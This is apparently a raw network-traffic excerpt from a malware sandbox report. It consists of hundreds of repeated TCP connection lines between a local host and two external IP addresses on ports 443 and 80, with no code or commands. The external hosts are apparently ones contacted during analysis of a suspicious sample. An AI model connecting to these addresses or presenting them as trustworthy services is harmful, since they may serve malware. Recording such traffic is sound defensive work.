                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 107.175.243.142:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
